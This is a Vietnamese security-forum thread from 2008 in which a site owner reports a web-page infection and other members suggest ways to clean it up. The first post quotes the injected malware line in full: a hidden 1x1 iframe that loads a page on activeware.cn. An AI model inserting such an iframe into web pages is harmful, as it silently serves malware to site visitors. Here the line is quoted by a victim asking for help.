English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Virus làm chuyển qua 1 site khác !!!  XML
  [Question]   Virus làm chuyển qua 1 site khác !!! 20/05/2008 00:57:28 (+0700) | #1 | 131411
[Avatar]
 odyssey
Member
[Minus]    0    [Plus]
Joined: 27/08/2007 14:03:35
Messages: 65
Offline
[Profile] [PM] [Yahoo!]
Hi Các Bro,

Sáng nay khi vào website của công ty thấy báo vius. Khi vào xem code thì file nào virus cũng thêm đoạn link sau:
<iframe src="http://activeware.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>
File *.Php thì virus thêm vào đoạn link trên.
Antivirus báo cửa sổ : Virus: trojan.Peacomm.D.
Nhờ các Bro chỉ cách giúp vì cần gấp.
P/s: Sever đặt bên Mỹ HDH Linux: Fedora Core 6

[Up] [Print Copy]
  [Question]   Re: Virus làm chuyển qua 1 site khác !!! 20/05/2008 01:58:33 (+0700) | #2 | 131420
nkp
Member
[Minus]    0    [Plus]
Joined: 09/03/2008 13:36:56
Messages: 29
Offline
[Profile] [PM]
Symantec nhận dạng ra con này là Trojan.Peacomm.D còn KIS là Email-Worm.Win32.Zhelatin.pv

Có thể máy bạn đã bị nhiễm Bạn tải chương trình diệt Virus nào về quét nó ở máy bạn đi.Thử xem có dính chú nào không.

Nếu không thì có thể server bị nhiễm rồi.Liên lạc server nhờ họ giải quyết dùm cho.
[Up] [Print Copy]
  [Question]   Re: Virus làm chuyển qua 1 site khác !!! 20/05/2008 02:47:22 (+0700) | #3 | 131425
[Avatar]
 odyssey
Member
[Minus]    0    [Plus]
Joined: 27/08/2007 14:03:35
Messages: 65
Offline
[Profile] [PM] [Yahoo!]
Cảm ơn bạn nkp đã trả lời. Hiện tại mình đã nhờ dịch vụ bên Server bên nước ngoài hổ trợ rồi. Hiện tại mình đang làm là :
- Upload lại các website đã bị dính virus.
Ai đã bị trường hợp giống mình chưa? Nếu Upload xong mà bị tình trạng cũ thì oải lắm.
Cám ơn.

[Up] [Print Copy]
  [Question]   Re: Virus làm chuyển qua 1 site khác !!! 20/05/2008 02:51:03 (+0700) | #4 | 131426
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
HÌnh thức giải quyết, nên upload lại toàn bộ website công ty bằng bản backup. HÌnh thức phá hoại, iframe hack sử dụng tool. Ý kiến cá nhân theo các thông tin từ google.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re: Virus làm chuyển qua 1 site khác !!! 20/05/2008 06:34:04 (+0700) | #5 | 131467
[Avatar]
 odyssey
Member
[Minus]    0    [Plus]
Joined: 27/08/2007 14:03:35
Messages: 65
Offline
[Profile] [PM] [Yahoo!]
Cảm ơn Bác tmd. Hiện tại mình đã upload toàn bộ website và chạy ổn định. Làm sao fix được sự cố đó không Bác ? Xin hướng dẫn để lần sau ko bị tình trạng như cũ, Đa change Pass admin va ftp và các pass khác. Các Bro đã gặp tình trạng trên. Pls help. Thank you
P/s: Mình đã vào thử trang web: http://activeware.cn/ind.php nhưng ko có gì cả ???

[Up] [Print Copy]
  [Question]   Re: Virus làm chuyển qua 1 site khác !!! 20/05/2008 08:45:23 (+0700) | #6 | 131503
[Avatar]
 tmd
Member
[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Bạn nên thảo luận ở box bảo mật trang web , chạy trên fedora core 6, các cấu hình đã làm, ... các thứ. Vào thử cái trang trên, tức là chạy cái đoạn code được mã hóa đó, đoạn code được thưc thi, mắt nhìn không thấy gì.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|